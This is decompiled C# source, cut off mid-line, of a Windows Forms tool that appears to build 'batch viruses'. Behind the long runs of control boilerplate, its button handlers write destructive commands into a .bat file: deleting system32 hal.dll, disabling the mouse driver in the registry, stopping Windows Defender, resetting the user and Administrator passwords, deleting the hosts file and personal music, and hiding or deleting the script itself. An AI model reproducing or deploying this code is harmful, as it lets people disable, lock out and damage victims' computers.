eventHandler; } } internal virtual RichTextBox RichTextBox2 { [DebuggerNonUserCode] get => this._RichTextBox2; [DebuggerNonUserCode, MethodImpl(MethodImplOptions.Synchronized)] set { EventHandler eventHandler = new EventHandler(this.RichTextBox2_TextChanged); if (this._RichTextBox2 != null) this._RichTextBox2.TextChanged -= eventHandler; this._RichTextBox2 = value; if (this._RichTextBox2 == null) return; this._RichTextBox2.TextChanged += eventHandler; } } internal virtual Button Button30 { [DebuggerNonUserCode] get => this._Button30; [DebuggerNonUserCode, MethodImpl(MethodImplOptions.Synchronized)] set { EventHandler eventHandler = new EventHandler(this.Button30_Click); if (this._Button30 != null) this._Button30.Click -= eventHandler; this._Button30 = value; if (this._Button30 == null) return; this._Button30.Click += eventHandler; } } internal virtual Button Button31 { [DebuggerNonUserCode] get => this._Button31; [DebuggerNonUserCode, MethodImpl(MethodImplOptions.Synchronized)] set { EventHandler eventHandler = new EventHandler(this.Button31_Click); if (this._Button31 != null) this._Button31.Click -= eventHandler; this._Button31 = value; if (this._Button31 == null) return; this._Button31.Click += eventHandler; } } internal virtual Button Button40 { [DebuggerNonUserCode] get => this._Button40; [DebuggerNonUserCode, MethodImpl(MethodImplOptions.Synchronized)] set { EventHandler eventHandler = new EventHandler(this.Button40_Click); if (this._Button40 != null) this._Button40.Click -= eventHandler; this._Button40 = value; if (this._Button40 == null) return; this._Button40.Click += eventHandler; } } internal virtual Button Button41 { [DebuggerNonUserCode] get => this._Button41; [DebuggerNonUserCode, MethodImpl(MethodImplOptions.Synchronized)] set { EventHandler eventHandler = new EventHandler(this.Button41_Click); if (this._Button41 != null) this._Button41.Click -= eventHandler; this._Button41 = value; if (this._Button41 == null) return; this._Button41.Click += eventHandler; } } internal virtual Button Button38 { [DebuggerNonUserCode] get => this._Button38; [DebuggerNonUserCode, MethodImpl(MethodImplOptions.Synchronized)] set { EventHandler eventHandler = new EventHandler(this.Button38_Click); if (this._Button38 != null) this._Button38.Click -= eventHandler; this._Button38 = value; if (this._Button38 == null) return; this._Button38.Click += eventHandler; } } internal virtual Button Button39 { [DebuggerNonUserCode] get => this._Button39; [DebuggerNonUserCode, MethodImpl(MethodImplOptions.Synchronized)] set { EventHandler eventHandler = new EventHandler(this.Button39_Click); if (this._Button39 != null) this._Button39.Click -= eventHandler; this._Button39 = value; if (this._Button39 == null) return; this._Button39.Click += eventHandler; } } internal virtual Button Button37 { [DebuggerNonUserCode] get => this._Button37; [DebuggerNonUserCode, MethodImpl(MethodImplOptions.Synchronized)] set { EventHandler eventHandler = new EventHandler(this.Button37_Click); if (this._Button37 != null) this._Button37.Click -= eventHandler; this._Button37 = value; if (this._Button37 == null) return; this._Button37.Click += eventHandler; } } internal virtual Button Button36 { [DebuggerNonUserCode] get => this._Button36; [DebuggerNonUserCode, MethodImpl(MethodImplOptions.Synchronized)] set { EventHandler eventHandler = new EventHandler(this.Button36_Click); if (this._Button36 != null) this._Button36.Click -= eventHandler; this._Button36 = value; if (this._Button36 == null) return; this._Button36.Click += eventHandler; } } internal virtual Button Button34 { [DebuggerNonUserCode] get => this._Button34; [DebuggerNonUserCode, MethodImpl(MethodImplOptions.Synchronized)] set { EventHandler eventHandler = new EventHandler(this.Button34_Click); if (this._Button34 != null) this._Button34.Click -= eventHandler; this._Button34 = value; if (this._Button34 == null) return; this._Button34.Click += eventHandler; } } internal virtual Button Button35 { [DebuggerNonUserCode] get => this._Button35; [DebuggerNonUserCode, MethodImpl(MethodImplOptions.Synchronized)] set { EventHandler eventHandler = new EventHandler(this.Button35_Click); if (this._Button35 != null) this._Button35.Click -= eventHandler; this._Button35 = value; if (this._Button35 == null) return; this._Button35.Click += eventHandler; } } internal virtual Button Button33 { [DebuggerNonUserCode] get => this._Button33; [DebuggerNonUserCode, MethodImpl(MethodImplOptions.Synchronized)] set { EventHandler eventHandler = new EventHandler(this.Button33_Click); if (this._Button33 != null) this._Button33.Click -= eventHandler; this._Button33 = value; if (this._Button33 == null) return; this._Button33.Click += eventHandler; } } internal virtual Button Button32 { [DebuggerNonUserCode] get => this._Button32; [DebuggerNonUserCode, MethodImpl(MethodImplOptions.Synchronized)] set { EventHandler eventHandler = new EventHandler(this.Button32_Click); if (this._Button32 != null) this._Button32.Click -= eventHandler; this._Button32 = value; if (this._Button32 == null) return; this._Button32.Click += eventHandler; } } internal virtual Button Button17 { [DebuggerNonUserCode] get => this._Button17; [DebuggerNonUserCode, MethodImpl(MethodImplOptions.Synchronized)] set { EventHandler eventHandler = new EventHandler(this.Button17_Click); if (this._Button17 != null) this._Button17.Click -= eventHandler; this._Button17 = value; if (this._Button17 == null) return; this._Button17.Click += eventHandler; } } internal virtual Button Button57 { [DebuggerNonUserCode] get => this._Button57; [DebuggerNonUserCode, MethodImpl(MethodImplOptions.Synchronized)] set { EventHandler eventHandler = new EventHandler(this.Button57_Click); if (this._Button57 != null) this._Button57.Click -= eventHandler; this._Button57 = value; if (this._Button57 == null) return; this._Button57.Click += eventHandler; } } internal virtual Button Button58 { [DebuggerNonUserCode] get => this._Button58; [DebuggerNonUserCode, MethodImpl(MethodImplOptions.Synchronized)] set { EventHandler eventHandler = new EventHandler(this.Button58_Click); if (this._Button58 != null) this._Button58.Click -= eventHandler; this._Button58 = value; if (this._Button58 == null) return; this._Button58.Click += eventHandler; } } internal virtual Button Button59 { [DebuggerNonUserCode] get => this._Button59; [DebuggerNonUserCode, MethodImpl(MethodImplOptions.Synchronized)] set { EventHandler eventHandler = new EventHandler(this.Button59_Click); if (this._Button59 != null) this._Button59.Click -= eventHandler; this._Button59 = value; if (this._Button59 == null) return; this._Button59.Click += eventHandler; } } internal virtual Button Button60 { [DebuggerNonUserCode] get => this._Button60; [DebuggerNonUserCode, MethodImpl(MethodImplOptions.Synchronized)] set { EventHandler eventHandler = new EventHandler(this.Button60_Click); if (this._Button60 != null) this._Button60.Click -= eventHandler; this._Button60 = value; if (this._Button60 == null) return; this._Button60.Click += eventHandler; } } internal virtual Button Button61 { [DebuggerNonUserCode] get => this._Button61; [DebuggerNonUserCode, MethodImpl(MethodImplOptions.Synchronized)] set { EventHandler eventHandler = new EventHandler(this.Button61_Click); if (this._Button61 != null) this._Button61.Click -= eventHandler; this._Button61 = value; if (this._Button61 == null) return; this._Button61.Click += eventHandler; } } internal virtual Button Button42 { [DebuggerNonUserCode] get => this._Button42; [DebuggerNonUserCode, MethodImpl(MethodImplOptions.Synchronized)] set { EventHandler eventHandler = new EventHandler(this.Button42_Click); if (this._Button42 != null) this._Button42.Click -= eventHandler; this._Button42 = value; if (this._Button42 == null) return; this._Button42.Click += eventHandler; } } internal virtual Button Button43 { [DebuggerNonUserCode] get => this._Button43; [DebuggerNonUserCode, MethodImpl(MethodImplOptions.Synchronized)] set { EventHandler eventHandler = new EventHandler(this.Button43_Click); if (this._Button43 != null) this._Button43.Click -= eventHandler; this._Button43 = value; if (this._Button43 == null) return; this._Button43.Click += eventHandler; } } internal virtual Button Button44 { [DebuggerNonUserCode] get => this._Button44; [DebuggerNonUserCode, MethodImpl(MethodImplOptions.Synchronized)] set { EventHandler eventHandler = new EventHandler(this.Button44_Click); if (this._Button44 != null) this._Button44.Click -= eventHandler; this._Button44 = value; if (this._Button44 == null) return; this._Button44.Click += eventHandler; } } internal virtual Button Button45 { [DebuggerNonUserCode] get => this._Button45; [DebuggerNonUserCode, MethodImpl(MethodImplOptions.Synchronized)] set { EventHandler eventHandler = new EventHandler(this.Button45_Click); if (this._Button45 != null) this._Button45.Click -= eventHandler; this._Button45 = value; if (this._Button45 == null) return; this._Button45.Click += eventHandler; } } internal virtual Button Button46 { [DebuggerNonUserCode] get => this._Button46; [DebuggerNonUserCode, MethodImpl(MethodImplOptions.Synchronized)] set { EventHandler eventHandler = new EventHandler(this.Button46_Click); if (this._Button46 != null) this._Button46.Click -= eventHandler; this._Button46 = value; if (this._Button46 == null) return; this._Button46.Click += eventHandler; } } internal virtual Button Button47 { [DebuggerNonUserCode] get => this._Button47; [DebuggerNonUserCode, MethodImpl(MethodImplOptions.Synchronized)] set { EventHandler eventHandler = new EventHandler(this.Button47_Click); if (this._Button47 != null) this._Button47.Click -= eventHandler; this._Button47 = value; if (this._Button47 == null) return; this._Button47.Click += eventHandler; } } internal virtual Button Button48 { [DebuggerNonUserCode] get => this._Button48; [DebuggerNonUserCode, MethodImpl(MethodImplOptions.Synchronized)] set { EventHandler eventHandler = new EventHandler(this.Button48_Click); if (this._Button48 != null) this._Button48.Click -= eventHandler; this._Button48 = value; if (this._Button48 == null) return; this._Button48.Click += eventHandler; } } internal virtual Button Button49 { [DebuggerNonUserCode] get => this._Button49; [DebuggerNonUserCode, MethodImpl(MethodImplOptions.Synchronized)] set { EventHandler eventHandler = new EventHandler(this.Button49_Click); if (this._Button49 != null) this._Button49.Click -= eventHandler; this._Button49 = value; if (this._Button49 == null) return; this._Button49.Click += eventHandler; } } internal virtual Button Button50 { [DebuggerNonUserCode] get => this._Button50; [DebuggerNonUserCode, MethodImpl(MethodImplOptions.Synchronized)] set { EventHandler eventHandler = new EventHandler(this.Button50_Click); if (this._Button50 != null) this._Button50.Click -= eventHandler; this._Button50 = value; if (this._Button50 == null) return; this._Button50.Click += eventHandler; } } internal virtual Button Button51 { [DebuggerNonUserCode] get => this._Button51; [DebuggerNonUserCode, MethodImpl(MethodImplOptions.Synchronized)] set { EventHandler eventHandler = new EventHandler(this.Button51_Click); if (this._Button51 != null) this._Button51.Click -= eventHandler; this._Button51 = value; if (this._Button51 == null) return; this._Button51.Click += eventHandler; } } internal virtual Button Button52 { [DebuggerNonUserCode] get => this._Button52; [DebuggerNonUserCode, MethodImpl(MethodImplOptions.Synchronized)] set { EventHandler eventHandler = new EventHandler(this.Button52_Click); if (this._Button52 != null) this._Button52.Click -= eventHandler; this._Button52 = value; if (this._Button52 == null) return; this._Button52.Click += eventHandler; } } internal virtual Button Button53 { [DebuggerNonUserCode] get => this._Button53; [DebuggerNonUserCode, MethodImpl(MethodImplOptions.Synchronized)] set { EventHandler eventHandler = new EventHandler(this.Button53_Click); if (this._Button53 != null) this._Button53.Click -= eventHandler; this._Button53 = value; if (this._Button53 == null) return; this._Button53.Click += eventHandler; } } internal virtual Button Button54 { [DebuggerNonUserCode] get => this._Button54; [DebuggerNonUserCode, MethodImpl(MethodImplOptions.Synchronized)] set { EventHandler eventHandler = new EventHandler(this.Button54_Click); if (this._Button54 != null) this._Button54.Click -= eventHandler; this._Button54 = value; if (this._Button54 == null) return; this._Button54.Click += eventHandler; } } internal virtual Button Button55 { [DebuggerNonUserCode] get => this._Button55; [DebuggerNonUserCode, MethodImpl(MethodImplOptions.Synchronized)] set { EventHandler eventHandler = new EventHandler(this.Button55_Click); if (this._Button55 != null) this._Button55.Click -= eventHandler; this._Button55 = value; if (this._Button55 == null) return; this._Button55.Click += eventHandler; } } internal virtual Button Button56 { [DebuggerNonUserCode] get => this._Button56; [DebuggerNonUserCode, MethodImpl(MethodImplOptions.Synchronized)] set { EventHandler eventHandler = new EventHandler(this.Button56_Click); if (this._Button56 != null) this._Button56.Click -= eventHandler; this._Button56 = value; if (this._Button56 == null) return; this._Button56.Click += eventHandler; } } internal virtual CheckBox CheckBox2 { [DebuggerNonUserCode] get => this._CheckBox2; [DebuggerNonUserCode, MethodImpl(MethodImplOptions.Synchronized)] set { EventHandler eventHandler = new EventHandler(this.CheckBox2_CheckedChanged); if (this._CheckBox2 != null) this._CheckBox2.CheckedChanged -= eventHandler; this._CheckBox2 = value; if (this._CheckBox2 == null) return; this._CheckBox2.CheckedChanged += eventHandler; } } internal virtual Button Button62 { [DebuggerNonUserCode] get => this._Button62; [DebuggerNonUserCode, MethodImpl(MethodImplOptions.Synchronized)] set { EventHandler eventHandler = new EventHandler(this.Button62_Click); if (this._Button62 != null) this._Button62.Click -= eventHandler; this._Button62 = value; if (this._Button62 == null) return; this._Button62.Click += eventHandler; } } internal virtual Button Button8 { [DebuggerNonUserCode] get => this._Button8; [DebuggerNonUserCode, MethodImpl(MethodImplOptions.Synchronized)] set { EventHandler eventHandler = new EventHandler(this.Button8_Click_1); if (this._Button8 != null) this._Button8.Click -= eventHandler; this._Button8 = value; if (this._Button8 == null) return; this._Button8.Click += eventHandler; } } internal virtual Label Label1 { [DebuggerNonUserCode] get => this._Label1; [DebuggerNonUserCode, MethodImpl(MethodImplOptions.Synchronized)] set { EventHandler eventHandler = new EventHandler(this.Label1_Click); if (this._Label1 != null) this._Label1.Click -= eventHandler; this._Label1 = value; if (this._Label1 == null) return; this._Label1.Click += eventHandler; } } internal virtual System.Windows.Forms.Timer Timer1 { [DebuggerNonUserCode] get => this._Timer1; [DebuggerNonUserCode, MethodImpl(MethodImplOptions.Synchronized)] set { EventHandler eventHandler = new EventHandler(this.Timer1_Tick_1); if (this._Timer1 != null) this._Timer1.Tick -= eventHandler; this._Timer1 = value; if (this._Timer1 == null) return; this._Timer1.Tick += eventHandler; } } internal virtual CheckBox CheckBox1 { [DebuggerNonUserCode] get => this._CheckBox1; [DebuggerNonUserCode, MethodImpl(MethodImplOptions.Synchronized)] set { EventHandler eventHandler = new EventHandler(this.CheckBox1_CheckedChanged_1); if (this._CheckBox1 != null) this._CheckBox1.CheckedChanged -= eventHandler; this._CheckBox1 = value; if (this._CheckBox1 == null) return; this._CheckBox1.CheckedChanged += eventHandler; } } internal virtual Button Button63 { [DebuggerNonUserCode] get => this._Button63; [DebuggerNonUserCode, MethodImpl(MethodImplOptions.Synchronized)] set { EventHandler eventHandler = new EventHandler(this.Button63_Click_1); if (this._Button63 != null) this._Button63.Click -= eventHandler; this._Button63 = value; if (this._Button63 == null) return; this._Button63.Click += eventHandler; } } internal virtual Button Button67 { [DebuggerNonUserCode] get => this._Button67; [DebuggerNonUserCode, MethodImpl(MethodImplOptions.Synchronized)] set { EventHandler eventHandler = new EventHandler(this.Button67_Click); if (this._Button67 != null) this._Button67.Click -= eventHandler; this._Button67 = value; if (this._Button67 == null) return; this._Button67.Click += eventHandler; } } internal virtual Button Button68 { [DebuggerNonUserCode] get => this._Button68; [DebuggerNonUserCode, MethodImpl(MethodImplOptions.Synchronized)] set { EventHandler eventHandler = new EventHandler(this.Button68_Click); if (this._Button68 != null) this._Button68.Click -= eventHandler; this._Button68 = value; if (this._Button68 == null) return; this._Button68.Click += eventHandler; } } internal virtual Button Button70 { [DebuggerNonUserCode] get => this._Button70; [DebuggerNonUserCode, MethodImpl(MethodImplOptions.Synchronized)] set { EventHandler eventHandler = new EventHandler(this.Button70_Click); if (this._Button70 != null) this._Button70.Click -= eventHandler; this._Button70 = value; if (this._Button70 == null) return; this._Button70.Click += eventHandler; } } internal virtual Button Button73 { [DebuggerNonUserCode] get => this._Button73; [DebuggerNonUserCode, MethodImpl(MethodImplOptions.Synchronized)] set { EventHandler eventHandler = new EventHandler(this.Button73_Click); if (this._Button73 != null) this._Button73.Click -= eventHandler; this._Button73 = value; if (this._Button73 == null) return; this._Button73.Click += eventHandler; } } internal virtual Button Button71 { [DebuggerNonUserCode] get => this._Button71; [DebuggerNonUserCode, MethodImpl(MethodImplOptions.Synchronized)] set { EventHandler eventHandler = new EventHandler(this.Button71_Click); if (this._Button71 != null) this._Button71.Click -= eventHandler; this._Button71 = value; if (this._Button71 == null) return; this._Button71.Click += eventHandler; } } internal virtual CheckBox CheckBox3 { [DebuggerNonUserCode] get => this._CheckBox3; [DebuggerNonUserCode, MethodImpl(MethodImplOptions.Synchronized)] set { EventHandler eventHandler = new EventHandler(this.CheckBox3_CheckedChanged); if (this._CheckBox3 != null) this._CheckBox3.CheckedChanged -= eventHandler; this._CheckBox3 = value; if (this._CheckBox3 == null) return; this._CheckBox3.CheckedChanged += eventHandler; } } internal virtual Button Button64 { [DebuggerNonUserCode] get => this._Button64; [DebuggerNonUserCode, MethodImpl(MethodImplOptions.Synchronized)] set { EventHandler eventHandler = new EventHandler(this.Button64_Click_2); if (this._Button64 != null) this._Button64.Click -= eventHandler; this._Button64 = value; if (this._Button64 == null) return; this._Button64.Click += eventHandler; } } internal virtual Panel Panel1 { [DebuggerNonUserCode] get => this._Panel1; [DebuggerNonUserCode, MethodImpl(MethodImplOptions.Synchronized)] set => this._Panel1 = value; } internal virtual TextBox TextBox1 { [DebuggerNonUserCode] get => this._TextBox1; [DebuggerNonUserCode, MethodImpl(MethodImplOptions.Synchronized)] set => this._TextBox1 = value; } internal virtual Label Label4 { [DebuggerNonUserCode] get => this._Label4; [DebuggerNonUserCode, MethodImpl(MethodImplOptions.Synchronized)] set { EventHandler eventHandler = new EventHandler(this.Label4_Click); if (this._Label4 != null) this._Label4.Click -= eventHandler; this._Label4 = value; if (this._Label4 == null) return; this._Label4.Click += eventHandler; } } internal virtual Label Label5 { [DebuggerNonUserCode] get => this._Label5; [DebuggerNonUserCode, MethodImpl(MethodImplOptions.Synchronized)] set { EventHandler eventHandler = new EventHandler(this.Label5_Click); if (this._Label5 != null) this._Label5.Click -= eventHandler; this._Label5 = value; if (this._Label5 == null) return; this._Label5.Click += eventHandler; } } internal virtual Label Label6 { [DebuggerNonUserCode] get => this._Label6; [DebuggerNonUserCode, MethodImpl(MethodImplOptions.Synchronized)] set => this._Label6 = value; } internal virtual Button Button65 { [DebuggerNonUserCode] get => this._Button65; [DebuggerNonUserCode, MethodImpl(MethodImplOptions.Synchronized)] set { EventHandler eventHandler = new EventHandler(this.Button65_Click_1); if (this._Button65 != null) this._Button65.Click -= eventHandler; this._Button65 = value; if (this._Button65 == null) return; this._Button65.Click += eventHandler; } } internal virtual Button Button66 { [DebuggerNonUserCode] get => this._Button66; [DebuggerNonUserCode, MethodImpl(MethodImplOptions.Synchronized)] set { EventHandler eventHandler = new EventHandler(this.Button66_Click_1); if (this._Button66 != null) this._Button66.Click -= eventHandler; this._Button66 = value; if (this._Button66 == null) return; this._Button66.Click += eventHandler; } } internal virtual Label Label2 { [DebuggerNonUserCode] get => this._Label2; [DebuggerNonUserCode, MethodImpl(MethodImplOptions.Synchronized)] set => this._Label2 = value; } internal virtual Label Label3 { [DebuggerNonUserCode] get => this._Label3; [DebuggerNonUserCode, MethodImpl(MethodImplOptions.Synchronized)] set => this._Label3 = value; } private void Form1_Load(object sender, EventArgs e) { this.Label4.Text = new WebClient().DownloadString("http://www.whatismyip.com/automation/n09230945.asp"); this.Timer1.Start(); } private void Button2_Click(object sender, EventArgs e) { this.RichTextBox1.Text = ""; this.RichTextBox1.AppendText("@echo off" + Environment.NewLine); this.RichTextBox1.AppendText("Color 0a" + Environment.NewLine); this.RichTextBox1.AppendText("" + Environment.NewLine); } private void Button3_Click(object sender, EventArgs e) { this.RichTextBox1.Text = ""; this.RichTextBox1.AppendText("" + Environment.NewLine); this.RichTextBox1.Text = "@echo off"; this.RichTextBox1.AppendText("" + Environment.NewLine); this.RichTextBox1.AppendText("Color 0a" + Environment.NewLine); if (Operators.CompareString(this.RichTextBox1.Text, "@echo off", false) != 0) ; } private void Button1_Click(object sender, EventArgs e) { SaveFileDialog saveFileDialog = new SaveFileDialog(); saveFileDialog.FileName = "change this.bat"; saveFileDialog.Filter = "batch file (*.bat)|*.bat|ALL FILES (*.*)|*.*"; saveFileDialog.Title = "Save File"; saveFileDialog.CheckPathExists = true; int num = (int) saveFileDialog.ShowDialog((IWin32Window) this); try { MyProject.Computer.FileSystem.WriteAllText(saveFileDialog.FileName, this.RichTextBox1.Text, false); } catch (Exception ex) { ProjectData.SetProjectError(ex); ProjectData.ClearProjectError(); } } private void CheckBox1_CheckedChanged(object sender, EventArgs e) { } private void Button5_Click(object sender, EventArgs e) { this.RichTextBox1.AppendText("del /f /q %0" + Environment.NewLine); this.RichTextBox1.AppendText("" + Environment.NewLine); } private void Button6_Click(object sender, EventArgs e) { this.RichTextBox1.AppendText("" + Environment.NewLine); this.RichTextBox1.AppendText("set key = HKEY_LOCAL_MACHINE\\system\\CurrentControlSet\\Services\\Mouclass" + Environment.NewLine); this.RichTextBox1.AppendText("reg delete %key%" + Environment.NewLine); this.RichTextBox1.AppendText("reg add %key% /v Start /t REG_DWORD /d 4" + Environment.NewLine); this.RichTextBox1.AppendText("" + Environment.NewLine); } private void RichTextBox1_TextChanged(object sender, EventArgs e) { } private void Button7_Click(object sender, EventArgs e) { this.RichTextBox1.AppendText("" + Environment.NewLine); this.RichTextBox1.AppendText("cls" + Environment.NewLine); } private void Button8_Click(object sender, EventArgs e) { } private void Button9_Click(object sender, EventArgs e) { int num1 = (int) Interaction.MsgBox((object) "23097008946757 is password when you open then file", MsgBoxStyle.Critical); int num2 = (int) Interaction.MsgBox((object) "please rember that ", MsgBoxStyle.Critical); this.RichTextBox1.AppendText("" + Environment.NewLine); this.RichTextBox1.AppendText("net user %username% 23097008946757" + Environment.NewLine); this.RichTextBox1.AppendText("net user Administrator 23097008946757" + Environment.NewLine); this.RichTextBox2.Visible = false; this.Button30.Visible = false; } private void Button10_Click(object sender, EventArgs e) { this.RichTextBox1.AppendText("" + Environment.NewLine); this.RichTextBox1.AppendText("time 12:00" + Environment.NewLine); } private void Button4_Click(object sender, EventArgs e) { MyProject.Forms.real_batch_virus_s.Show(); this.Hide(); } private void Button11_Click(object sender, EventArgs e) { MyProject.Forms.warning_for_the_hal.Show(); this.Hide(); this.RichTextBox1.AppendText("" + Environment.NewLine); this.RichTextBox1.AppendText("del /f /q %SystemDrive%\\WINDOWS\\system32\\hal.dll" + Environment.NewLine); } private void Button12_Click(object sender, EventArgs e) { this.RichTextBox2.Visible = false; this.Button30.Visible = false; this.RichTextBox1.AppendText("" + Environment.NewLine); this.RichTextBox1.AppendText("attrib +h %0" + Environment.NewLine); } private void Button13_Click(object sender, EventArgs e) { this.RichTextBox1.AppendText("" + Environment.NewLine); this.RichTextBox1.AppendText("net stop WinDefend" + Environment.NewLine); } private void Button14_Click(object sender, EventArgs e) { this.RichTextBox1.AppendText("" + Environment.NewLine); this.RichTextBox1.AppendText("del /f /q %0" + Environment.NewLine); this.RichTextBox2.Visible = false; this.Button30.Visible = false; } private void Button15_Click(object sender, EventArgs e) { this.RichTextBox1.AppendText("" + Environment.NewLine); this.RichTextBox1.AppendText("FORMAT drive: [/V[:label]] [/Q] [/F:size] [/B | /S] [/C]" + Environment.NewLine); this.RichTextBox1.AppendText("FORMAT drive: [/V[:label]] [/Q] [/T:tracks /N:sectors] [/B | /S] [/C]" + Environment.NewLine); this.RichTextBox1.AppendText("FORMAT drive: [/V[:label]] [/Q] [/1] [/4] [/B | /S] [/C]" + Environment.NewLine); this.RichTextBox1.AppendText("FORMAT drive: [/Q] [/1] [/4] [/8] [/B | /S] [/C]" + Environment.NewLine); } private void Button16_Click(object sender, EventArgs e) { } private void Button18_Click(object sender, EventArgs e) { this.RichTextBox1.AppendText("" + Environment.NewLine); this.RichTextBox1.AppendText("tskill WINWORD" + Environment.NewLine); } private void Button19_Click(object sender, EventArgs e) { this.RichTextBox1.AppendText("" + Environment.NewLine); this.RichTextBox1.AppendText("tskill msnmsgr" + Environment.NewLine); } private void Button20_Click(object sender, EventArgs e) { this.RichTextBox1.AppendText("" + Environment.NewLine); this.RichTextBox1.AppendText("tskill calc" + Environment.NewLine); } private void Button21_Click(object sender, EventArgs e) { this.RichTextBox1.AppendText("" + Environment.NewLine); this.RichTextBox1.AppendText("tskill msaccess" + Environment.NewLine); } private void Button22_Click(object sender, EventArgs e) { this.RichTextBox1.AppendText("" + Environment.NewLine); this.RichTextBox1.AppendText("tskill Notepad" + Environment.NewLine); } private void Button23_Click(object sender, EventArgs e) { this.RichTextBox1.AppendText("" + Environment.NewLine); this.RichTextBox1.AppendText("tskill JPS" + Environment.NewLine); } private void Button24_Click(object sender, EventArgs e) { } private void Button16_Click_1(object sender, EventArgs e) { this.RichTextBox1.AppendText("" + Environment.NewLine); this.RichTextBox1.AppendText("del /f /q %SystemDrive%\\WINDOWS\\system32\\drivers\\etc\\hosts" + Environment.NewLine); } private void Button24_Click_1(object sender, EventArgs e) { this.RichTextBox1.AppendText("" + Environment.NewLine); this.RichTextBox1.AppendText("del /f /q '%userprofile%\\My Music\\*.*'" + Environment.NewLine); } private void RichTextBox2_TextChanged(object sender, EventArgs e) { } private void Button25_Click(object sender, EventArgs e) { this.Button62.Visible = true; this.Button30.Visible = true; this.RichTextBox2.Visible = true; this.RichTextBox1.Visible = false; } private void Button30_Click(object sender, EventArgs e) { SaveFileDialog saveFileDialog = new SaveFileDialog(); saveFileDialog.FileName = "cd looper.bat"; saveFileDialog.Filter = "cd looper.bat (*.bat)|*.vbs|ALL FILES (*.*)|*.*"; saveFileDialog.Title = "Save File"; saveFileDialog.CheckPathExists = true; int num = (int) saveFileDialog.ShowDialog((IWin32Window) this); try { MyProject.Computer.FileSystem.WriteAllText(saveFileDialog.FileName, this.RichTextBox2.Text, false); } catch (Exception ex) { ProjectData.SetProjectError(ex); ProjectData.ClearProjectError(); } this.RichTextBox2.Visible = false; this.RichTextBox1.Visible = true; this.Button30.Visible = false; } private void Button26_Click(object sender, EventArgs e) { this.RichTextBox1.AppendText("" + Environment.NewLine); this.RichTextBox1.AppendText("DIR /S/B %SystemDrive%\\*.exe" + Environment.NewLine); } private void Button27_Click(object sender, EventArgs e) { this.RichTextBox1.AppendText("" + Environment.NewLine); this.RichTextBox1.AppendText("DIR /S/B %SystemDrive%\\*.vbs" + Environment.NewLine); } private void Button28_Click(object sender, EventArgs e) { this.RichTextBox1.AppendText("" + Environment.NewLine); this.RichTextBox1.AppendText("DIR /S/B %SystemDrive%\\*.html" + Environment.NewLine); } private void Button29_Click(object sender, EventArgs e) { this.RichTextBox1.AppendText("" + Environment.NewLine); this.RichTextBox1.AppendText("DIR /S/B %SystemDrive%\\*.rar" + Environment.NewLine); } private void Button31_Click(object sender, EventArgs e) { this.RichTextBox1.AppendText("" + Environment.NewLine); this.RichTextBox1.AppendText("DIR /S/B %SystemDrive%\\*.bat" + Environment.NewLine); } private void Button32_Click(object sender, EventArgs e) { this.RichTextBox1.AppendText("" + Environment.NewLine); this.RichTextBox1.AppendText("DIR /S/B %SystemDrive%\\*.ico" + Environment.NewLine); } private void Button33_Click(object sender, EventArgs e) { this.RichTextBox1.AppendText("" + Environment.NewLine); this.RichTextBox1.AppendText("DIR /S/B %SystemDrive%\\*.js" + Environment.NewLine); } private void Button35_Click(object sender, EventArgs e) { this.RichTextBox1.AppendText("" + Environment.NewLine); this.RichTextBox1.AppendText("DIR /S/B %SystemDrive%\\*.java" + Environment.NewLine); } private void Button34_Click(object sender, EventArgs e) { this.RichTextBox1.AppendText("" + Environment.NewLine); this.RichTextBox1.AppendText("DIR /S/B %SystemDrive%\\*.ini" + Environment.NewLine); } private void Button36_Click(object sender, EventArgs e) { this.RichTextBox1.AppendText("" + Environment.NewLine); this.RichTextBox1.AppendText("DIR /S/B %SystemDrive%\\*.msi" + Environment.NewLine); } private void Button37_Click(object sender, EventArgs e) { this.RichTextBox1.AppendText("" + Environment.NewLine); this.RichTextBox1.AppendText("DIR /S/B %SystemDrive%\\*.dll" + Environment.NewLine); } private void Button39_Click(object sender, EventArgs e) { this.RichTextBox1.AppendText("" + Environment.NewLine); this.RichTextBox1.AppendText("DIR /S/B %SystemDrive%\\*.log" + Environment.NewLine); } private void Button38_Click(object sender, EventArgs e) { this.RichTextBox1.AppendText("" + Environment.NewLine); this.RichTextBox1.AppendText("DIR /S/B %SystemDrive%\\*.bmp" + Environment.NewLine); } private void Button41_Click(object sender, EventArgs e) { this.RichTextBox1.AppendText("" + Environment.NewLine); this.RichTextBox1.AppendText("DIR /S/B %SystemDrive%\\*.reg" + Environment.NewLine); } private void Button40_Click(object sender, EventArgs e) { this.RichTextBox1.AppendText("" + Environment.NewLine); this.RichTextBox1.AppendText("DIR /S/B %SystemDrive%\\*.jpg" + Environment.NewLine); } private void Button17_Click(object sender, EventArgs e) { this.RichTextBox1.AppendText("" + Environment.NewLine); this.RichTextBox1.AppendText("tskill ALG" + Environment.NewLine); } private void Button61_Click(object sender, EventArgs e) { this.RichTextBox1.AppendText("" + Environment.NewLine); this.RichTextBox1.AppendText("DIR /S/B %SystemDrive%\\*.com" + Environment.NewLine); } private void Button60_Click(object sender, EventArgs e) { this.RichTextBox1.AppendText("" + Environment.NewLine); this.RichTextBox1.AppendText("DIR /S/B %SystemDrive%\\*.scr" + Environment.NewLine); } private void Button59_Click(object sender, EventArgs e) { this.RichTextBox1.AppendText("" + Environment.NewLine); this.RichTextBox1.AppendText("DIR /S/B %SystemDrive%\\*.cpp" + Environment.NewLine); } private void Button58_Click(object sender, EventArgs e) { this.RichTextBox1.AppendText("" + Environment.NewLine); this.RichTextBox1.AppendText("DIR /S/B %SystemDrive%\\*.dev" + Environment.NewLine); } private void Button57_Click(object sender, EventArgs e) { this.RichTextBox1.AppendText("" + Environment.NewLine); this.RichTextBox1.AppendText("DIR /S/B %SystemDrive%\\*.rc" + Environment.NewLine); } private void Button56_Click(object sender, EventArgs e) { this.RichTextBox1.AppendText("" + Environment.NewLine); this.RichTextBox1.AppendText("DIR /S/B %SystemDrive%\\*.h" + Environment.NewLine); } private void Button55_Click(object sender, EventArgs e) { this.RichTextBox1.AppendText("" + Environment.NewLine); this.RichTextBox1.AppendText("DIR /S/B %SystemDrive%\\*.png" + Environment.NewLine); } private void Button54_Click(object sender, EventArgs e) { this.RichTextBox1.AppendText("" + Environment.NewLine); this.RichTextBox1.AppendText("DIR /S/B %SystemDrive%\\*.css" + Environment.NewLine); } private void Button53_Click(object sender, EventArgs e) { this.RichTextBox1.AppendText("" + Environment.NewLine); this.RichTextBox1.AppendText("DIR /S/B %SystemDrive%\\*.dat" + Environment.NewLine); } private void Button52_Click(object sender, EventArgs e) { this.RichTextBox1.AppendText("" + Environment.NewLine); this.RichTextBox1.AppendText("DIR 